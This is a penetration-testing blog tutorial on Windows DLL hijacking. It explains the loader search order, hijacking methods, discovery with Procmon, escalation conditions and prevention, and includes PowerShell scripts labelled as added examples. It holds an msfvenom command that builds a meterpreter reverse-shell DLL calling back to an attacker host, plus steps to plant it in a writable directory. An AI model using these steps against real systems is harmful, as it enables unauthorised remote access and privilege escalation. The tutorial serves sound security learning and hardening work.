TCAPT: DLL Hijacking

Pranay Bafna
6 min read, Nov 24, 2021


Hello Hackmates, I’ve been learning about Thick Client Application Penetration Testing and recently came across the topic of DLL Hijacking. I’ve added all the references I used while studying this topic. So, let’s BEGIN.


What is a DLL?

A DLL is a library that contains code and data that can be used by more than one program at the same time. A DLL contains functions, classes, variables, UIs and resources (such as icons, images, files, etc.) that an EXE, or other DLL uses. DLLs are so much like an EXE that the file format itself is the same. Both EXE and DLLs are based on the Portable Executable (PE) file format.

Loading a DLL

A program loads a DLL implicitly at startup when the DLL is listed in its import table (or is a dependency of another DLL being loaded), or explicitly at run time through the Win32 API LoadLibrary / LoadLibraryEx. Once the DLL is in memory, the program calls GetProcAddress to obtain the address of an exported function and LoadResource to obtain a resource from it.

GetProcAddress Function: Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).

LoadResource Function: Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.

How do you open a DLL file?

DLL files aren’t opened the way most file types are; they are loaded by an application. To look inside one you use a tool rather than double-clicking it: dumpbin (ships with Visual Studio) lists a DLL’s headers, imports and exports, a disassembler such as IDA or Ghidra shows the native code, and a decompiler such as dotPeek recovers source from .NET DLLs. The export list is what you need for DLL proxying, described below.

How do you install a DLL file?

DLL files aren’t installed like other file types. A DLL is ‘installed’ simply by placing it in a directory where the application looks for it, which is exactly the behaviour DLL hijacking abuses.

Now, let’s start with our topic: DLL Hijacking

DLL hijacking is, in the broadest sense, tricking a legitimate/trusted application into loading an arbitrary DLL. In other words, DLL hijacking is a method of injecting malicious code into an application by exploiting the way some Windows applications search and load Dynamic Link Libraries (DLL).

When an application loads a DLL by name alone (no path), the loader first checks whether a module of that name is already loaded and whether it is a KnownDLL (a fixed list under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs, always taken from System32); only otherwise does it search the following locations, in this order (this is the order with SafeDllSearchMode enabled, which is the default):

  • The directory from which the application is loaded
  • C:\Windows\System32
  • C:\Windows\System (the 16-bit system directory)
  • C:\Windows
  • The current working directory
  • Directories listed in the PATH environment variable (the system PATH followed by the user PATH)

With SafeDllSearchMode disabled, the current working directory moves up to second place, directly after the application directory.
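To make this concrete, here is an added example (written for this edit, not code from the original post) that walks the search order above for a DLL an application loads by bare name and reports, from the perspective of the current user, every directory at or before the real copy that is writable. The executable path and DLL name in the usage lines at the bottom are assumptions.

```powershell
# Added example, not code from the original post: walk the DLL search order for a
# DLL loaded by bare name and report which directories the current user can write to.
# The exe path and DLL name in the usage lines are assumptions for illustration.

function Test-DirectoryWritable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    # Try to create and delete an empty file: the exact operation an attacker needs.
    $probe = Join-Path $Dir ('~probe-' + [guid]::NewGuid().ToString('N'))
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Test-KnownDll {
    # KnownDLLs (kernel32.dll, user32.dll, ...) are mapped from \KnownDlls and never searched on disk.
    param([string]$DllName)
    $k = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs' -ErrorAction SilentlyContinue
    if ($null -eq $k) { return $false }
    return [bool]($k.PSObject.Properties | Where-Object { $_.Value -is [string] -and $_.Value -ieq $DllName })
}

function Get-DllSearchOrder {
    param([Parameter(Mandatory)][string]$ExePath)
    $appDir = Split-Path -Parent ((Resolve-Path -LiteralPath $ExePath).Path)
    $winDir = $env:SystemRoot
    $cwd    = (Get-Location).Path
    # SafeDllSearchMode is on unless the value is explicitly 0; off moves the CWD to second place.
    $sm = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager' -Name SafeDllSearchMode -ErrorAction SilentlyContinue
    $safe = -not ($null -ne $sm -and $sm.SafeDllSearchMode -eq 0)
    $order = @($appDir)
    if (-not $safe) { $order += $cwd }
    $order += "$winDir\System32", "$winDir\System", $winDir
    if ($safe) { $order += $cwd }
    # %PATH% as the process sees it: system PATH followed by user PATH, already merged in $env:PATH.
    $order += ($env:PATH -split ';' | ForEach-Object { $_.Trim('"') } | Where-Object { $_ -ne '' })
    return $order
}

function Resolve-DllHijack {
    param(
        [Parameter(Mandatory)][string]$ExePath,
        [Parameter(Mandatory)][string]$DllName
    )
    if (Test-KnownDll $DllName) { Write-Warning "$DllName is a KnownDLL; the search order is never consulted for it"; return }
    $seen  = @{}
    $found = $false
    foreach ($dir in Get-DllSearchOrder -ExePath $ExePath) {
        $key = $dir.TrimEnd('\').ToLower()
        if ($seen.ContainsKey($key)) { continue }    # PATH often repeats earlier directories
        $seen[$key] = $true
        $present  = Test-Path -LiteralPath ([System.IO.Path]::Combine($dir, $DllName)) -PathType Leaf
        $writable = Test-DirectoryWritable -Dir $dir
        [pscustomobject]@{
            Directory  = $dir
            DllPresent = $present
            Writable   = $writable
            # Writable and not yet past the real copy: present = DLL replacement, absent = search-order hijack.
            Hijackable = ($writable -and -not $found)
        }
        if ($present) { $found = $true }
    }
}

# Usage (paths are assumptions): run as the low-privileged user you are testing from.
$exe = 'C:\Program Files\ThickClient\client.exe'
if (Test-Path -LiteralPath $exe) {
    Resolve-DllHijack -ExePath $exe -DllName 'version.dll' | Format-Table -AutoSize
}
```

A Hijackable row with DllPresent true is the DLL replacement case; with DllPresent false it is search-order hijacking, or a phantom DLL if no row at all has the DLL present. The probe write is a real file creation, so run this only in directories you are authorised to touch.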

Approaches for DLL Hijacking:

  1. DLL Replacement: replace a legitimate DLL with an evil DLL. This can be combined with DLL Proxying, in which the evil DLL forwards every export to the original (renamed) DLL so all functionality of the application remains intact.
  2. DLL Search Order Hijacking: DLLs that an application specifies without a path are searched for in fixed locations in a specific order. The search order is hijacked by putting the evil DLL in a location that is searched before the one holding the real DLL. This sometimes includes the working directory of the target application.
  3. Phantom DLL Hijacking: drop an evil DLL in place of a missing/non-existent DLL that a legitimate application tries to load; since it is found nowhere, any writable directory in the search order will do.
  4. DLL Redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or by using .exe.manifest / .exe.local files, so that the folder containing the evil DLL is searched.
  5. WinSxS DLL Replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often referred to as DLL side-loading.
  6. Relative Path DLL Hijacking: copy the legitimate application to a user-writable folder, alongside the evil DLL, so that the application directory (first in the search order) is one you control.

Testing Approach for DLL Hijacking:

Find vulnerable DLLs using Procmon.

Process Monitor (Procmon) is a Sysinternals monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.

Setting up filters in Procmon: open Filter > Filter… and add “Result” “is” “NAME NOT FOUND” (failed lookups only) and “Path” “ends with” “.dll” (DLL loads only).

To enumerate missing DLLs for a specific executable, add another filter: “Process Name” “is” “<executable-name>”. Apply it, then start (or restart) the application and capture its events. Each remaining NAME NOT FOUND entry is a directory in which the loader looked for a DLL and did not find it, listed in the order the loader tried them.

Exploiting Missing DLLs

For privilege escalation the best case is a process that runs with higher privileges than ours and loads a DLL by name, where a directory that comes earlier in its search order than the DLL’s real location is writable by us: our DLL is found first and the legitimate one never loads. The other case is a DLL that does not exist anywhere on the system (a phantom DLL): then every directory in the search order is a candidate, and write access to any one of them is enough.

Escalating Privileges

  • Find a process that runs with other (higher) privileges and is missing a DLL.
  • Have write permission on one of the folders in which that DLL is going to be searched for, before the place (if any) where it is actually found.
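The steps above can be scripted against a Procmon export so the list of candidates survives a long capture. The following is an added example (not from the original post): it parses a CSV saved from Process Monitor and separates DLLs that were missed in an early directory but found later (search-order candidates) from DLLs never found at all (phantom DLLs). The rows in $sampleCsv are constructed for the example; a real capture is loaded with Import-Csv.

```powershell
# Added example, not from the original post: parse a Process Monitor CSV export
# (File > Save..., CSV format) and pull out the DLL loads that failed.
# The rows in $sampleCsv are constructed for this example.

$sampleCsv = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1234567 AM","client.exe","4242","CreateFile","C:\Program Files\ThickClient\version.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.1240000 AM","client.exe","4242","CreateFile","C:\Windows\System32\version.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:03.0000000 AM","client.exe","4242","CreateFile","C:\Program Files\ThickClient\telemetry.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:03.0100000 AM","client.exe","4242","CreateFile","C:\Windows\System32\telemetry.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:03.0200000 AM","client.exe","4242","CreateFile","C:\Windows\telemetry.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:03.0300000 AM","client.exe","4242","CreateFile","C:\Users\pentest\AppData\Local\Tools\telemetry.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:03.0400000 AM","client.exe","4242","CreateFile","C:\Program Files\ThickClient\settings.xml","NAME NOT FOUND","Desired Access: Generic Read"
"10:01:03.0500000 AM","client.exe","4242","CreateFile","C:\Program Files\ThickClient\api-ms-win-core-synch-l1-2-0.dll","NAME NOT FOUND","Desired Access: Read Attributes"
'@

function Get-FailedDllLoads {
    param([Parameter(Mandatory)][object[]]$Events)
    # PATH NOT FOUND is kept too: it means a whole directory in the search order is missing.
    # api-ms-win-* / ext-ms-win-* are API set contract names resolved through the loader's
    # apiset schema; misses on them are usually noise and are dropped here.
    $Events | Where-Object {
        $_.Operation -eq 'CreateFile' -and
        $_.Result -in @('NAME NOT FOUND', 'PATH NOT FOUND') -and
        $_.Path -match '\.dll$' -and
        $_.Path -notmatch '\\(api|ext)-ms-win-'
    } | ForEach-Object {
        [pscustomobject]@{
            Process   = $_.'Process Name'
            PID       = [int]$_.PID
            DllName   = [System.IO.Path]::GetFileName($_.Path)
            Directory = [System.IO.Path]::GetDirectoryName($_.Path)
        }
    }
}

function Get-PhantomDlls {
    # A phantom DLL is one whose name never succeeded anywhere; every directory in the
    # search order is then a candidate, not only the ones before the real copy.
    param([Parameter(Mandatory)][object[]]$Events)
    $resolved = @($Events |
        Where-Object { $_.Operation -eq 'CreateFile' -and $_.Result -eq 'SUCCESS' -and $_.Path -match '\.dll$' } |
        ForEach-Object { [System.IO.Path]::GetFileName($_.Path).ToLower() } |
        Sort-Object -Unique)
    Get-FailedDllLoads -Events $Events |
        Where-Object { $resolved -notcontains $_.DllName.ToLower() } |
        Group-Object Process, DllName |
        ForEach-Object {
            [pscustomobject]@{
                Process     = $_.Group[0].Process
                DllName     = $_.Group[0].DllName
                # Every directory the loader tried, in the order it tried them.
                Directories = @($_.Group.Directory)
            }
        }
}

$events = $sampleCsv | ConvertFrom-Csv
"Failed DLL lookups (a miss in the app directory before the real copy is a search-order candidate):"
Get-FailedDllLoads -Events $events | Format-Table -AutoSize
"Phantom DLLs (never found anywhere):"
Get-PhantomDlls -Events $events | Format-List
# Real capture: $events = Import-Csv .\Logfile.CSV
```

A miss in the application directory followed by a hit in System32 is the normal pattern for almost every system DLL, so those rows only matter when the application directory is writable and the DLL is not a KnownDLL; the phantom list is where the interesting findings usually are.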

Generating Malicious DLL using Metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil-meterpreter-shell.dll

This generates a malicious DLL named evil-meterpreter-shell.dll. Start a matching handler (exploit/multi/handler with the same payload, LHOST and LPORT), rename the DLL to the targeted DLL name, drop it into the writable directory, restart the application and check whether you get a meterpreter shell. Two things to verify before blaming the target: the DLL’s bitness has to match the process (use windows/x64/meterpreter/reverse_tcp for a 64-bit application), and the application itself may crash or misbehave once the DLL is loaded, because it does not export the functions the application expects; DLL proxying (forwarding the real DLL’s exports) keeps it running.

How to prevent DLL Hijacking?

  • Keep SafeDllSearchMode enabled. It is on by default (since Windows XP SP2); the registry value SafeDllSearchMode under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager set to 0 turns it off. The CWDIllegalInDllSearch value (KB2264107) additionally removes the current working directory from the search order.
  • Ensure that only signed DLLs are loaded into system processes and sensitive applications, and verify the signatures of what is actually loaded. Application control (WDAC, AppLocker DLL rules) and the process mitigation policy that allows only Microsoft-signed binaries enforce this at load time.
  • Write loading code that leaves nothing to the search order: load DLLs by fully qualified path, call SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_DEFAULT_DIRS) at startup or pass LOAD_LIBRARY_SEARCH_SYSTEM32 to LoadLibraryEx for system DLLs, ship no dependencies on DLLs that do not exist on the target (each one is a phantom-DLL hijack waiting to happen), and make sure the installer does not grant Users write access to the application directory.
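As an added example (not from the original post), the following PowerShell checks the first two recommendations on a machine: it reads the search-order hardening values from the registry and lists the modules loaded into a running process that are either not validly signed or loaded from outside the Windows and Program Files trees, which is where a planted DLL shows up. The process name 'client' in the usage lines is an assumption.

```powershell
# Added example, not from the original post: audit search-order hardening and the
# signatures/locations of modules loaded into a process. Process name is an assumption.

function Get-DllSearchHardening {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
    $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    [pscustomobject]@{
        # Missing or 1 = safe search (CWD after the Windows directories); 0 = legacy order with CWD second.
        SafeDllSearchMode     = if ($null -eq $p.SafeDllSearchMode) { 'not set (enabled by default)' } else { $p.SafeDllSearchMode }
        # 0xFFFFFFFF = CWD never searched; 2 = not when CWD is a remote (UNC/WebDAV) folder; 1 = not when WebDAV.
        CWDIllegalInDllSearch = if ($null -eq $p.CWDIllegalInDllSearch) { 'not set' } else { '0x{0:X}' -f $p.CWDIllegalInDllSearch }
    }
}

function Get-SuspiciousProcessModules {
    param([Parameter(Mandatory)][string]$ProcessName)
    # Directories where legitimately installed code lives; anything loaded from elsewhere deserves a look.
    $trusted = @("$env:SystemRoot\*", "$env:ProgramFiles\*", "${env:ProgramFiles(x86)}\*")
    foreach ($proc in Get-Process -Name $ProcessName -ErrorAction Stop) {
        try { $modules = $proc.Modules } catch { Write-Warning "Cannot read modules of PID $($proc.Id): $_"; continue }
        foreach ($file in ($modules.FileName | Sort-Object -Unique)) {
            $sig = Get-AuthenticodeSignature -FilePath $file
            $inTrusted = [bool]($trusted | Where-Object { $file -like $_ })
            if ($sig.Status -eq 'Valid' -and $inTrusted) { continue }
            [pscustomobject]@{
                PID    = $proc.Id
                Module = $file
                Status = $sig.Status     # NotSigned, HashMismatch, NotTrusted, UnknownError, ...
                Signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
                Reason = if (-not $inTrusted) { 'loaded from outside Windows/Program Files' } else { 'signature not valid' }
            }
        }
    }
}

Get-DllSearchHardening
# Usage (process name is an assumption): audit a running instance of the thick client.
if (Get-Process -Name 'client' -ErrorAction SilentlyContinue) {
    Get-SuspiciousProcessModules -ProcessName 'client' | Format-Table -AutoSize
}
```

Reading the modules of a process that runs as another user needs an elevated shell, and a 32-bit process viewed from 64-bit PowerShell may not enumerate. Get-AuthenticodeSignature validates catalog signatures on current Windows versions, but on older systems catalog-signed OS files can report NotSigned, so treat the output as a review list rather than a verdict.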

BONUS TIP:

You can check your permissions in a folder by executing the following command:

icacls "Path-To-Dir"

The iCACLS command allows displaying or changing Access Control Lists (ACLs) for files and folders on the file system. The predecessor of the iCACLS.EXE utility is the CACLS.EXE command (which was used in Windows XP).


Below is the list of permission and inheritance codes that icacls displays and accepts:

iCACLS inheritance settings:

  • (OI) — object inherit;
  • (CI) — container inherit;
  • (IO) — inherit only;
  • (NP) — don’t propagate inherit;
  • (I) — permission inherited from the parent container.

List of basic access permissions:

  • D — delete access;
  • F — full access;
  • N — no access;
  • M — modify access;
  • RX — read and execute access;
  • R — read-only access;
  • W — write-only access.

Detailed permissions:

  • DE — delete;
  • RC — read control;
  • WDAC — write DAC;
  • WO — write owner;
  • S — synchronize;
  • AS — access system security;
  • MA — the maximum allowed permissions;
  • GR — generic read;
  • GW — generic write;
  • GE — generic execute;
  • GA — generic all;
  • RD — read data/list directory;
  • WD — write data/add file;
  • AD — append data/add subdirectory;
  • REA — read extended attributes;
  • WEA — write extended attributes;
  • X — execute/traverse;
  • DC — delete child;
  • RA — read attributes;
  • WA — write attributes.
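Reading those codes by eye across many directories gets old, so here is an added example (not from the original post) that parses icacls output and flags the ACEs that let a low-privileged principal plant a file in the directory, applying two details from the tables above: an (IO) entry applies to children only, not to the directory itself, and WDAC/WO do not write files but let the holder rewrite the ACL. The output in $sampleIcacls is constructed for the example; the principal names are the English ones icacls prints, so on a localised system adjust $lowPriv (or use Get-Acl and compare SIDs instead).

```powershell
# Added example, not from the original post: parse icacls output and flag ACEs that let
# a low-privileged principal create files in the directory. $sampleIcacls is constructed.

$sampleIcacls = @'
C:\Program Files\ThickClient BUILTIN\Users:(OI)(CI)(M)
                             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                             BUILTIN\Administrators:(I)(OI)(CI)(F)
                             NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
                             NT AUTHORITY\Authenticated Users:(I)(CI)(S,AD,X)
                             CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
'@

function ConvertFrom-IcaclsOutput {
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string]$Text)
    $inheritFlags = 'OI', 'CI', 'IO', 'NP', 'I'
    foreach ($raw in ($Text -split "`r?`n")) {
        $line = $raw.Trim()
        # The first line carries the path in front of the first ACE; strip it.
        if ($line.StartsWith($Path, [System.StringComparison]::OrdinalIgnoreCase)) {
            $line = $line.Substring($Path.Length).Trim()
        }
        # Anything that is not "principal:(..)(..)" (blank lines, the summary line) is skipped.
        if (-not ($line -match '^(?<principal>[^:]+):(?<aces>(?:\([^)]*\))+)$')) { continue }
        $principal = $Matches.principal
        $tokens = [regex]::Matches($Matches.aces, '\(([^)]*)\)') |
            ForEach-Object { $_.Groups[1].Value -split ',' } |
            ForEach-Object { $_.Trim() } | Where-Object { $_ }
        [pscustomobject]@{
            Principal   = $principal
            Deny        = [bool]($tokens -contains 'DENY')
            Inherited   = [bool]($tokens -contains 'I')
            # (IO) means the ACE applies to children only, not to this directory itself.
            AppliesHere = -not ($tokens -contains 'IO')
            Rights      = @($tokens | Where-Object { $_ -notin $inheritFlags -and $_ -ne 'DENY' })
        }
    }
}

function Find-PlantableAces {
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string]$Text)
    $lowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
               'NT AUTHORITY\INTERACTIVE', "$env:USERDOMAIN\$env:USERNAME"
    $canWrite      = 'F', 'M', 'W', 'GA', 'GW', 'WD'   # create or overwrite files in the directory
    $canRewriteAcl = 'WDAC', 'WO'                      # cannot write files, but can grant themselves write
    foreach ($ace in ConvertFrom-IcaclsOutput -Path $Path -Text $Text) {
        if ($ace.Deny -or -not $ace.AppliesHere -or $ace.Principal -notin $lowPriv) { continue }
        $direct = @($ace.Rights | Where-Object { $_ -in $canWrite })
        $viaAcl = @($ace.Rights | Where-Object { $_ -in $canRewriteAcl })
        if ($direct.Count -eq 0 -and $viaAcl.Count -eq 0) { continue }
        [pscustomobject]@{
            Principal = $ace.Principal
            Rights    = $ace.Rights -join ','
            How       = if ($direct.Count) { 'write: ' + ($direct -join ',') } else { 'ACL control: ' + ($viaAcl -join ',') }
        }
    }
}

Find-PlantableAces -Path 'C:\Program Files\ThickClient' -Text $sampleIcacls | Format-Table -AutoSize
# Live use: Find-PlantableAces -Path $dir -Text (icacls $dir | Out-String)
```

On the constructed output only the non-inherited BUILTIN\Users:(OI)(CI)(M) entry is reported: the Authenticated Users (M) entry is (IO) and so does not apply to the directory itself, and (S,AD,X) adds subdirectories but not files. That Users:(M) entry, usually left behind by an installer, is the classic finding behind a DLL hijack in a Program Files directory.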

Thank you for reading this blog.

Looking forward to posting more.

Happy Testing!

Twitter: @PranayB2511

